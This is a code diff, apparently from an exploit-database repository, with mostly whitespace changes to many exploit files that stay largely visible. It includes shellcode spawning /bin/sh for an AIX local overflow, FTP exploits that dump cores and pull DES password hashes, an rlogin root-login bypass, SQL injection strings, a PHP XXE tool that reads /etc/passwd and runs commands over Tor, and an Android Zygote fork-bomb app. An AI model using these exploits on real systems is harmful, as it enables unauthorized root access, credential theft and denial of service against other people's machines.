"\x39\x20\x48\x11"
"\x7c\xc7\x48\x10"
"\x38\x46\xc9\x05"
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"
"\x38\x87\xee\xef"
"\x7c\xc9\x03\xa6"
"\x38\x69\xef\x17"
"\x38\x87\xee\xef"
"\x7c\xc9\x03\xa6"
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"
"\x2f\x62\x69\x6e"
"\x2f\x73\x68\x00"
;
@ -44,22 +44,22 @@ int main(int argc, char **argv) {
int offset1 = 0;
offset1 = 0; // atoi(argv[1]);
memset(code, 'C', sizeof(code));
memcpy(code, envlabel,sizeof(envlabel)-1);
// landingzone
for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4)
// landingzone
for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4)
printint(i, 0x7ca52a79);
memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);
memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);
code[sizeof(code)-1] = 0;
env[0] = code;
env[1] = 0;
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf)-1] = 0;
buf[sizeof(buf)-1] = 0;
p = buf;
p += 4114;
printint(p,RETADDR); // try to hit the landingzone

2
exploits/aix/local/898.sh
View file

@ -6,7 +6,7 @@
#
# usage ./getr00t.sh :)
# exploitation gives euid(root) from here getting guid (root) is as simple as an
# /etc/passwd edit
# /etc/passwd edit
cd /tmp

20
exploits/aix/local/9645.sh
View file

@ -11,19 +11,19 @@
#
# *** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
#
# A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle
# the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which
# allows local users to gain privileges by leveraging a setuid-root program to
# create an arbitrary root-owned file with world-writable permissions, related
# A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle
# the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which
# allows local users to gain privileges by leveraging a setuid-root program to
# create an arbitrary root-owned file with world-writable permissions, related
# to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1
# (CVE-2009-2669).
#
# Typical privilege escalation techniques via arbitrary file creation don't
# seem to work on recent AIX versions: .rhosts is ignored if it is group or
# world writable; LIBPATH and LDR_PRELOAD have no effect for setuid binaries;
# Typical privilege escalation techniques via arbitrary file creation don't
# seem to work on recent AIX versions: .rhosts is ignored if it is group or
# world writable; LIBPATH and LDR_PRELOAD have no effect for setuid binaries;
# /var/spool/cron/atjobs seems useless as well, since we cannot open cron's
# named pipe /var/adm/cron/FIFO. Other viable exploitation vectors that come
# to mind, depending on the target box setup, are: /root/.ssh/authorized_keys,
# named pipe /var/adm/cron/FIFO. Other viable exploitation vectors that come
# to mind, depending on the target box setup, are: /root/.ssh/authorized_keys,
# /root/{.profile,.kshrc}, and /etc/rc.d/rc2.d.
#
# See also: http://milw0rm.com/exploits/9306
@ -32,7 +32,7 @@
# $ uname -a
# AIX rs6000 3 5 0052288E4C00
# $ lslpp -L xlC.rte | grep xlC.rte
# xlC.rte 9.0.0.1 C F XL C/C++ Runtime
# xlC.rte 9.0.0.1 C F XL C/C++ Runtime
# $ chmod +x raptor_libC
# $ ./raptor_libC /bin/bobobobobob
# [...]

32
exploits/aix/remote/14409.pl
View file

@ -28,19 +28,19 @@ $trgt = $ARGV[0];
$sock = IO::Socket::INET->new(PeerAddr => $trgt,
PeerPort => '21',
Proto => 'tcp');
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if ($ARGV[2] eq "") {
$user = "ftp";
$user = "ftp";
$pass = "c0deb4b3\@roothash.com";
} else {
$user = $ARGV[2];
$passwd = $ARGV[3];
$passwd = $ARGV[3];
}
$x = <$sock>;
print "*AIX EXPLOIT* REMOTE FTPD: $x\n";
if (fork()) {
@ -70,8 +70,8 @@ $x = <$sock>;
print "\t$x";
}
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print "\t$x";
print "*AIX EXPLOIT* TRIGGERING COREDUMP***\n";
@ -85,12 +85,12 @@ while(<$sock>) {
print "*AIX EXPLOIT* (SUCCESS)***\n*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***\n";
exit;
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
## CHEERIO!

28
exploits/aix/remote/14456.c
View file

@ -115,9 +115,9 @@ int main(int argc, char *argv[])
fprintf(stderr, "populating DES hash in memory...\n");
for (k=0;k<3;k++) {
for (k=0;k<3;k++) {
snprintf(out, sizeof out, "USER %s\r\n", crackme);
putline(s, out);
putline(s, out);
getline(s);
snprintf(out, sizeof out, "PASS abcdef\r\n");
putline(s,out);
@ -127,7 +127,7 @@ int main(int argc, char *argv[])
fprintf(stderr, "logging in...\n");
snprintf(out, sizeof out, "USER %s\r\n", username);
putline(s, out);
putline(s, out);
getline(s);
snprintf(out, sizeof out, "PASS %s\r\n", password);
putline(s,out);
@ -137,7 +137,7 @@ int main(int argc, char *argv[])
fprintf(stderr, "changing directory...\n");
snprintf(out, sizeof out, "CWD %s\r\n", writeto);
putline(s, out);
putline(s, out);
getline(s);
fprintf(stderr, "triggering segmentation violation...\n");
@ -172,7 +172,7 @@ int main(int argc, char *argv[])
fprintf(stderr, "logging in 2nd time...\n");
snprintf(out, sizeof out, "USER %s\r\n", username);
putline(s, out);
putline(s, out);
getline(s);
snprintf(out, sizeof out, "PASS %s\r\n", password);
putline(s,out);
@ -182,13 +182,13 @@ int main(int argc, char *argv[])
fprintf(stderr, "changing directory...\n");
snprintf(out, sizeof out, "CWD %s\r\n", writeto);
putline(s, out);
putline(s, out);
getline(s);
fprintf(stderr, "getting core file...\n");
snprintf(out, sizeof out, "TYPE I\r\n");
putline(s, out);
putline(s, out);
getline(s);
port = getpid() + 1024;
@ -209,8 +209,8 @@ int main(int argc, char *argv[])
octet_in[3]=atoi(oct);
snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
putline(s, out);
getline(s);
putline(s, out);
getline(s);
if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket");
@ -230,8 +230,8 @@ int main(int argc, char *argv[])
}
snprintf(out, sizeof out, "RETR core\r\n");
putline(s, out);
getline(s);
putline(s, out);
getline(s);
if (strstr(in, "150") == NULL) {
fprintf(stderr, "core file not found... terminating.\n");
close(s);
@ -261,7 +261,7 @@ int main(int argc, char *argv[])
close(nsock);
close(fd);
close(s);
close(s);
fprintf(stderr, "finally extracting DES hashes from core file for user '%s'...\n", crackme);
system("strings core | grep '^[A-Za-z0-9]\\{13\\}$'");
@ -286,7 +286,7 @@ int createconnection(char *target, char *targetport) {
s = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
if (s < 0) {
perror("socket");
exit(1);
exit(1);
}
if (connect(s, res->ai_addr, res->ai_addrlen) < 0) {
@ -322,7 +322,7 @@ void putline(int s, char *out) {
void usage(char *exe)
{
fprintf(stderr, "%s <-h host> <-i your internal ip> [-p port] [-l username] [-k password]"
" [-d writable directory] [-c user to crack] [-s use 'LIST' command on AIX 5.3]\n",
" [-d writable directory] [-c user to crack] [-s use 'LIST' command on AIX 5.3]\n",
exe);
exit(0);
}

2
exploits/aix/remote/19348.txt
View file

@ -1,5 +1,5 @@
source: https://www.securityfocus.com/bid/458/info
A problem with the way login parses arguments as passed by rlogind that may allow access to the root account.
A problem with the way login parses arguments as passed by rlogind that may allow access to the root account.
%rlogin -froot targethost.com

2
exploits/aix/remote/19532.pl
View file

@ -1,6 +1,6 @@
source: https://www.securityfocus.com/bid/679/info
A remote buffer overflow vulnerability in AIX's ftpd allows remote users to obtain root access.
A remote buffer overflow vulnerability in AIX's ftpd allows remote users to obtain root access.
#!/usr/bin/perl
# *** Synnergy Networks

4
exploits/aix/webapps/10372.txt
View file

@ -5,7 +5,7 @@
# Exploit Title: Blind SQL/XPath injection in OPMANAGER
# Date: 8-Dec-09
# Author: Asheesh Kumar Mani Tripathi
# Author: Asheesh Kumar Mani Tripathi
# AKS IT Services
# Software Link: http://www.manageengine.com/products/opmanager/download.html
# Version: [app version]
@ -25,7 +25,7 @@ Vulnerable:
http://<Ip adress:8060>overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX[Sql injectio ]&isFromInfra=yes HTTP/1.0
Get
Get
overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX'+and+313
37-31337=0+--+&isFromInfra=yes HTTP/1.0
Accept: */*

12
exploits/aix/webapps/21319.txt
View file

@ -8,15 +8,15 @@
# CVE : CVE-2012-2995, CVE-2012-2996
# Software Description
# TrendMicro Interscan Messaging Security is the industrys most comprehensive
# mail gateway security. Choose state-of-the-art software or a hybrid solution
# with on-premise virtual appliance and optional cloud pre-filter that blocks
# the vast majority of spam and malware outside your network. Plus our Data
# Privacy and Encryption Module secure outbound data to ensure privacy and
# TrendMicro Interscan Messaging Security is the industrys most comprehensive
# mail gateway security. Choose state-of-the-art software or a hybrid solution
# with on-premise virtual appliance and optional cloud pre-filter that blocks
# the vast majority of spam and malware outside your network. Plus our Data
# Privacy and Encryption Module secure outbound data to ensure privacy and
# regulatory compliance.
# Vulnerability Overview
# Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79)
# Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79)
# and cross-site request forgery (CWE-352) vulnerabilities.
# Proof of Concept

20
exploits/aix/webapps/33736.php
View file

@ -38,7 +38,7 @@ Not: Tor kurulu değilse proxy kismini kaldirin
Bug founded http://makthepla.net/blog/=/plesk-sso-xxe-xss
Tüm İslam Aleminin Beraat gecesi mubarek olsun dua edin:)
Tüm İslam Aleminin Beraat gecesi mubarek olsun dua edin:)
*/
function Gonder($domain,$komut,$method){
@ -48,11 +48,11 @@ function Gonder($domain,$komut,$method){
$komut = "expect://$komut";
break;
case "read":
$komut = "file://$komut";
$komut = "file://$komut";
break;
default:
$komut = "file://$komut";
}
$adres = "https://$domain:8443/relay";
@ -76,21 +76,21 @@ curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9050");
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
//Proxy end
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS,$postlar );
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$sonuc = curl_exec ($ch);
curl_close ($ch);
$gelenpaket = //"Paket: " . $postlar .
"Gonderilen Paket Boyutu: " . strlen($exploit)."\nRelayAdres: $relaystate\nSonuc: \r\n\r\n$sonuc \n";
return $gelenpaket;
$gelenpaket = //"Paket: " . $postlar .
"Gonderilen Paket Boyutu: " . strlen($exploit)."\nRelayAdres: $relaystate\nSonuc: \r\n\r\n$sonuc \n";
return $gelenpaket;
}
if($argc < 4){
$kullanim = "########################################################################\n";
$kullanim = "########################################################################\n";
$kullanim .= "Plesk XXE Exploit Tool by z00\n";
$kullanim .= "Kullanimi : php $argv[0].php domain /etc/passwd read \n";
$kullanim .= "Example : php $argv[0].php adres cmd (only expect installed) method \n";
$kullanim .= "Example : php $argv[0].php adres cmd (only expect installed) method \n";
$kullanim .= "Kullanilabilir Methodlar : \ncmd (Expect kurulu ise)\nread (Dosya okur) \n";
$kullanim .= "########################################################################\r\n";
echo $kullanim;
@ -100,6 +100,6 @@ $komut = $argv[2];
$method = $argv[3];
echo Gonder($domain,$komut,$method);
}
}
?>

150
exploits/android/dos/28957.txt
View file

@ -4,13 +4,13 @@
* Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
*
* Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
*
*
*
*
* @author Luca Verderame <luca.verderame@unige.it>
* @version 1.0
*
*
* Copyright 2012 Luca Verderame
*
*
* This file is part of ZygoteVulnerability.
ZygoteVulnerability is free software: you can redistribute it and/or modify
@ -25,7 +25,7 @@
You should have received a copy of the GNU General Public License
along with ZygoteVulnerability. If not, see <http://www.gnu.org/licenses/>.
*
*
*/
@ -36,12 +36,12 @@ import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;
public class BootReceiver extends BroadcastReceiver{
@Override
public void onReceive(Context context, Intent intent) {
Log.d("BOOT","boot completed. starting service");
Intent intentReceiver = new Intent();
intentReceiver.setAction("it.ailab.ServiceDOS");
@ -57,13 +57,13 @@ public class BootReceiver extends BroadcastReceiver{
* Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
*
* Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
*
*
*
*
* @author Luca Verderame <luca.verderame@unige.it>
* @version 1.0
*
*
* Copyright 2012 Luca Verderame
*
*
* This file is part of ZygoteVulnerability.
ZygoteVulnerability is free software: you can redistribute it and/or modify
@ -78,7 +78,7 @@ public class BootReceiver extends BroadcastReceiver{
You should have received a copy of the GNU General Public License
along with ZygoteVulnerability. If not, see <http://www.gnu.org/licenses/>.
*
*
*/
@ -99,11 +99,11 @@ import android.os.IBinder;
import android.util.Log;
public class ServiceDOS extends Service{
SocketUtil socketUtil = null;
public boolean connectToZygoteIfNeeded(){
int retry = 0;
while(((socketUtil == null) || (socketUtil.sZygoteSocket == null)) && retry < 20)
{
@ -118,7 +118,7 @@ public class ServiceDOS extends Service{
}
}
//loading part..
LocalSocket client = new LocalSocket();
try {
@ -128,7 +128,7 @@ public class ServiceDOS extends Service{
Log.e("SERV","link client error");
e1.printStackTrace();
}
if(client != null)
{
DataInputStream in = null;
@ -159,9 +159,9 @@ public class ServiceDOS extends Service{
}
return false;
}
@Override
public void onCreate() {
// Start up the thread running the service. Note that we create a
@ -169,20 +169,20 @@ public class ServiceDOS extends Service{
// main thread, which we don't want to block. We also make it
// background priority so CPU-intensive work will not disrupt our UI.
HandlerThread thread = new HandlerThread("ServiceDOS");
thread.start();
connectToZygoteIfNeeded();
thread.start();
connectToZygoteIfNeeded();
}
@Override
public IBinder onBind(Intent intent) {
// TODO Auto-generated method stub
onStartCommand(intent,0,0);
return null;
}
@Override
public int onStartCommand(Intent intent, int flags, int startId) {
Log.d("SERV","onStart");
final int uid = 123456;
final int gid = 123456;
@ -191,14 +191,14 @@ public class ServiceDOS extends Service{
String className = "com.android.internal.util.WithFramework";
//String className = "android.app.ActivityThread";
int res = 0;
int tr = 0;
while(tr<10000)
{
//String niceName = "DummyProcess" + tr;
connectToZygoteIfNeeded();
connectToZygoteIfNeeded();
try {
res = socketUtil.startViaZygote(className,null,uid,gid,gids,0,extraArgs);
} catch (Exception e) {
@ -210,11 +210,11 @@ public class ServiceDOS extends Service{
Log.d("SERV", "started process #:" +tr);
tr++;
}//fine while
//if whe return here -> restart!
return START_STICKY;
}
@Override
public void onDestroy (){
socketUtil.clean();
@ -233,13 +233,13 @@ public class ServiceDOS extends Service{
* Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
*
* Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
*
*
*
*
* @author Luca Verderame <luca.verderame@unige.it>
* @version 1.0
*
*
* Copyright 2012 Luca Verderame
*
*
* This file is part of ZygoteVulnerability.
ZygoteVulnerability is free software: you can redistribute it and/or modify
@ -254,7 +254,7 @@ public class ServiceDOS extends Service{
You should have received a copy of the GNU General Public License
along with ZygoteVulnerability. If not, see <http://www.gnu.org/licenses/>.
*
*
*/
@ -277,7 +277,7 @@ public class SocketAndroidActivity extends Activity {
startService(intent);
Log.d("APP","service activated");
this.finish();
}
}
@ -289,13 +289,13 @@ public class SocketAndroidActivity extends Activity {
* Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
*
* Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
*
*
*
*
* @author Luca Verderame <luca.verderame@unige.it>
* @version 1.0
*
*
* Copyright 2012 Luca Verderame
*
*
* This file is part of ZygoteVulnerability.
ZygoteVulnerability is free software: you can redistribute it and/or modify
@ -310,7 +310,7 @@ public class SocketAndroidActivity extends Activity {
You should have received a copy of the GNU General Public License
along with ZygoteVulnerability. If not, see <http://www.gnu.org/licenses/>.
*
*
*/
package it.ailab;
@ -323,11 +323,11 @@ import java.util.ArrayList;
import android.net.LocalSocket;
public class SocketUtil {
static LocalSocket sZygoteSocket = null;
static DataInputStream sZygoteInputStream = null;
static BufferedWriter sZygoteWriter = null;
/* versione unixDomainSocket
static UnixDomainSocketClient sZygoteSocket = null;
public SocketUtil(UnixDomainSocketClient c, DataInputStream i,BufferedWriter o)
@ -337,7 +337,7 @@ public class SocketUtil {
sZygoteWriter = o;
}
*/
public void clean()
{
try {
@ -352,14 +352,14 @@ public class SocketUtil {
sZygoteWriter = null;
sZygoteInputStream = null;
}
public SocketUtil(LocalSocket c, DataInputStream i,BufferedWriter o)
{
sZygoteSocket = c;
sZygoteInputStream = i;
sZygoteWriter = o;
}
/*
* Starts a new process via the zygote mechanism.
Parameters:
@ -375,7 +375,7 @@ public class SocketUtil {
Throws:
Exception if process start failed for any reason
*/
public int startViaZygote(final String processClass,
final String niceName,
final int uid, final int gid,
@ -384,10 +384,10 @@ public class SocketUtil {
String[] extraArgs)
throws Exception {
int pid;
synchronized(Process.class) {
ArrayList<String> argsForZygote = new ArrayList<String>();
// --runtime-init, --setuid=, --setgid=,
// and --setgroups= must go first
argsForZygote.add("--runtime-init");
@ -395,7 +395,7 @@ public class SocketUtil {
//argsForZygote.add("--setgid=" + gid);
//argsForZygote.add("--classpath=:data:data:socketAndroid");
//argsForZygote.add("data.data.android.socket.a.socket.DummyClass");
//opzioni da sistemare eventualmente dopo & Zygote.DEBUG_ENABLE_SAFEMODE, & Zygote.DEBUG_ENABLE_DEBUGGER
//& Zygote.DEBUG_ENABLE_CHECKJNI & Zygote.DEBUG_ENABLE_ASSERT
if ((debugFlags ) != 0) {
@ -410,16 +410,16 @@ public class SocketUtil {
if ((debugFlags ) != 0) {
argsForZygote.add("--enable-assert");
}
//TODO optionally enable debuger
//argsForZygote.add("--enable-debugger");
/*
// --setgroups is a comma-separated list
if (gids != null && gids.length > 0) {
StringBuilder sb = new StringBuilder();
sb.append("--setgroups=");
int sz = gids.length;
for (int i = 0; i < sz; i++) {
if (i != 0) {
@ -427,50 +427,50 @@ public class SocketUtil {
}
sb.append(gids[i]);
}
argsForZygote.add(sb.toString());
}
*/
if (niceName != null) {
argsForZygote.add("--nice-name=" + niceName);
}
argsForZygote.add(processClass);
if (extraArgs != null) {
for (String arg : extraArgs) {
argsForZygote.add(arg);
}
}
pid = zygoteSendArgsAndGetPid(argsForZygote);
}
if (pid <= 0) {
throw new Exception("zygote start failed:" + pid);
}
return pid;
}
private static int zygoteSendArgsAndGetPid(ArrayList<String> args)
throws Exception {
int pid = 0;
//openZygoteSocketIfNeeded();
try {
/*See com.android.internal.os.ZygoteInit.readArgumentList()
Presently the wire format to the zygote process is:
a) a count of arguments (argc, in essence)
b) a number of newline-separated argument strings equal to count After the zygote process reads
/*See com.android.internal.os.ZygoteInit.readArgumentList()
Presently the wire format to the zygote process is:
a) a count of arguments (argc, in essence)
b) a number of newline-separated argument strings equal to count After the zygote process reads
these it will write the pid of the child or -1 on failure.
*/
sZygoteWriter.write(Integer.toString(args.size()));
sZygoteWriter.newLine();
int sz = args.size();
for (int i = 0; i < sz; i++) {
String arg = args.get(i);
@ -481,12 +481,12 @@ public class SocketUtil {
sZygoteWriter.write(arg);
sZygoteWriter.newLine();
}
sZygoteWriter.flush();
// Should there be a timeout on this?
pid = sZygoteInputStream.readInt();
if (pid < 0) {
throw new Exception("fork() failed");
}
@ -500,11 +500,11 @@ public class SocketUtil {
}
*/
sZygoteSocket = null;
throw new Exception(ex);
}
}
return pid;
}

2
exploits/android/dos/31308.html
View file

@ -4,7 +4,7 @@ Android Web Browser is prone to an integer-overflow vulnerability because it fai
Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will likely cause denial-of-service conditions.
This issue affects Android SDK m5-rc14 and earlier.
This issue affects Android SDK m5-rc14 and earlier.
# This script generates a Bitmap file that makes the Android browser
jump to the address at 0xffffff+0x10

46
exploits/android/dos/35637.py
View file

@ -3,18 +3,18 @@
#!/usr/bin/python
#-*- coding: utf-8 -*
# Title: WhatsApp Remote Reboot/Crash App Android
# Product: WhatsApp
# Vendor Homepage: http://www.whatsapp.com
# Vulnerable Version(s): 2.11.476
# Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4
# Vulnerable Version(s): 2.11.476
# Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4
# Date: 26/12/2014
# #RemoteExecution - www.remoteexecution.net
# #RemoteExecution - www.remoteexecution.net
#
# Author Exploit:
# Daniel Godoy @0xhielasangre <danielgodoy@gobiernofederal.com>
# Credits:
# Credits:
# Gonza Cabrera
#
# Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
@ -38,15 +38,15 @@ from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequ
from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
from Yowsup.Contacts.contacts import WAContactsSyncRequest
import threading,time, base64
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
COUNTRIES_CSV = "countries.csv"
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
######## Yowsup Configuration file #####################
# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n
# phone: Your full phone number including country code, without '+' or '00'
@ -58,26 +58,26 @@ DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
# password: Password to use for login. You obtain this password when you register using Yowsup.
######################################################
MINE_CONFIG ="config"
def getCredentials(config = DEFAULT_CONFIG):
if os.path.isfile(config):
f = open(config)
phone = ""
idx = ""
pw = ""
cc = ""
try:
for l in f:
line = l.strip()
if len(line) and line[0] not in ('#',';'):
prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
varname = prep[0].strip()
val = prep[1].strip()
if varname == "phone":
phone = val
elif varname == "id":
@ -86,22 +86,22 @@ def getCredentials(config = DEFAULT_CONFIG):
pw =val
elif varname == "cc":
cc = val
return (cc, phone, idx, pw);
except:
pass
return 0
def main(phone):
credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )
if credentials:
countryCode, login, identity, password = credentials
identity = Utilities.processIdentity(identity)
password = base64.b64decode(password)
# Custom message that will crash WhatsApp
message = message = "#RemoteExecution

2
exploits/android/dos/38610.txt
View file

@ -16,7 +16,7 @@ I/DEBUG ( 2958): x20 0000007f9c664080 x21 0000000089e76b2c x22 000000
I/DEBUG ( 2958): x24 0000000000000020 x25 0000000000000020 x26 0000000000000020 x27 0000007f9c664080
I/DEBUG ( 2958): x28 00000000000001da x29 0000000032e89ae0 x30 0000007faad70e64
I/DEBUG ( 2958): sp 0000007f9cfff170 pc 0000007faad72dbc pstate 0000000080000000
I/DEBUG ( 2958):
I/DEBUG ( 2958):
I/DEBUG ( 2958): backtrace:
I/DEBUG ( 2958): #00 pc 000000000002ddbc /system/lib64/libSecMMCodec.so (ColorMap+200)
I/DEBUG ( 2958): #01 pc 000000000002be60 /system/lib64/libSecMMCodec.so (decodeGIF+340)

2
exploits/android/dos/38611.txt
View file

@ -20,7 +20,7 @@ I/DEBUG ( 2955): x20 0000000000000000 x21 0000007f94c65150 x22 000000
I/DEBUG ( 2955): x24 0000000012d39070 x25 0000000000000066 x26 0000000012d23b80 x27 0000000000000066
I/DEBUG ( 2955): x28 0000000000000000 x29 0000007f949cfd70 x30 0000007f87acd200
I/DEBUG ( 2955): sp 0000007f949cfd70 pc 0000000000000000 pstate 0000000040000000
I/DEBUG ( 2955):
I/DEBUG ( 2955):
I/DEBUG ( 2955): backtrace:
I/DEBUG ( 2955): #00 pc 0000000000000000 <unknown>
I/DEBUG ( 2955): #01 pc 0000000000000001 <unknown>

2
exploits/android/dos/38612.txt
View file

@ -18,7 +18,7 @@ I/DEBUG ( 2956): x20 0000000000000001 x21 0000007f8cebe000 x22 000000
I/DEBUG ( 2956): x24 0000000000000000 x25 0000000000000000 x26 0000000010000000 x27 0000007f8c5ff050
I/DEBUG ( 2956): x28 0000007f8ce77800 x29 000000000000001c x30 0000007f9f09fff8
I/DEBUG ( 2956): sp 0000007f8d0fea20 pc 0000007f9f09e83c pstate 0000000080000000
I/DEBUG ( 2956):
I/DEBUG ( 2956):
I/DEBUG ( 2956): backtrace:
I/DEBUG ( 2956): #00 pc 000000000009b83c /system/lib64/libQjpeg.so (WINKJ_DoIntegralUpsample+164)
I/DEBUG ( 2956): #01 pc 000000000009cff4 /system/lib64/libQjpeg.so (WINKJ_SetupUpsample+228)

6
exploits/android/dos/38613.txt
View file

@ -14,9 +14,9 @@ I/DEBUG ( 2961): x20 0000007f65f54020 x21 00000000002f0020 x22 000000
I/DEBUG ( 2961): x24 0000000000000004 x25 0000007f65f42300 x26 0000000000000020 x27 0000007f65f52080
I/DEBUG ( 2961): x28 00000000000001da x29 0000000013071460 x30 0000007f6ba7e40c
I/DEBUG ( 2961): sp 0000007f66796130 pc 0000007f958f8e28 pstate 0000000020000000
I/DEBUG ( 2961):
I/DEBUG ( 2961):
I/DEBUG ( 2961): backtrace:
I/InjectionManager(12532): Inside getClassLibPath caller
I/InjectionManager(12532): Inside getClassLibPath caller
I/DEBUG ( 2961): #00 pc 0000000000019e28 /system/lib64/libc.so (memset+168)
I/DEBUG ( 2961): #01 pc 0000000000030408 /system/lib64/libSecMMCodec.so (sbmpd_decode_rle_complete+64)
I/DEBUG ( 2961): #02 pc 0000000000033440 /system/lib64/libSecMMCodec.so (DecodeFile+120)
@ -25,7 +25,7 @@ I/DEBUG ( 2961): #04 pc 000000000042ec00 /system/priv-app/SecGallery2015/
To reproduce, download the file and open it in Gallery.
This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2.
This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38613.zip

6
exploits/android/dos/38614.txt
View file

@ -15,7 +15,7 @@ I/DEBUG ( 2962): x20 00000000ffffffff x21 0000000000000001 x22 000000
I/DEBUG ( 2962): x24 0000007f983feb44 x25 0000007f983feb48 x26 ffffffffffffffe8 x27 0000007f98118600
I/DEBUG ( 2962): x28 0000007f98177800 x29 000000000000001c x30 0000007faabb8ff8
I/DEBUG ( 2962): sp 0000007f983fea50 pc 8080808080808080 pstate 0000000000000000
I/DEBUG ( 2962):
I/DEBUG ( 2962):
I/DEBUG ( 2962): backtrace:
I/DEBUG ( 2962): #00 pc 8080808080808080 <unknown>
I/DEBUG ( 2962): #01 pc 00000000000000a6 <unknown>
@ -32,7 +32,7 @@ I/DEBUG ( 2956): x20 0000007f8031e618 x21 0000007f89cf2000 x22 000000
I/DEBUG ( 2956): x24 0000007f80331170 x25 0000000000000010 x26 00000000000001f4 x27 fffffffffffffffc
I/DEBUG ( 2956): x28 000000000000007d x29 0000007f84efea60 x30 0000007f89c4e194
I/DEBUG ( 2956): sp 0000007f84efea60 pc 0000007f89cae0b4 pstate 0000000020000000
I/DEBUG ( 2956):
I/DEBUG ( 2956):
I/DEBUG ( 2956): backtrace:
I/DEBUG ( 2956): #00 pc 00000000000790b4 /system/lib64/libc.so (je_free+92)
I/DEBUG ( 2956): #01 pc 0000000000019190 /system/lib64/libc.so (free+20)
@ -52,7 +52,7 @@ To reproduce the issue, download the file and wait for media scanning to occur,
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0
This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2.
This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38614.zip

2
exploits/android/dos/39424.txt
View file

@ -18,7 +18,7 @@ I/DEBUG ( 3021): x20 000000000000001f x21 0000007f89f98000 x22 000000
I/DEBUG ( 3021): x24 0000007f71809b10 x25 0000000000000010 x26 0000000000000080 x27 fffffffffffffffc
I/DEBUG ( 3021): x28 0000007f7edf9dd0 x29 0000007f7edf9b50 x30 0000007f89ef3914
I/DEBUG ( 3021): sp 0000007f7edf9b50 pc 0000007f89f53b24 pstate 0000000020000000
I/DEBUG ( 3021):
I/DEBUG ( 3021):
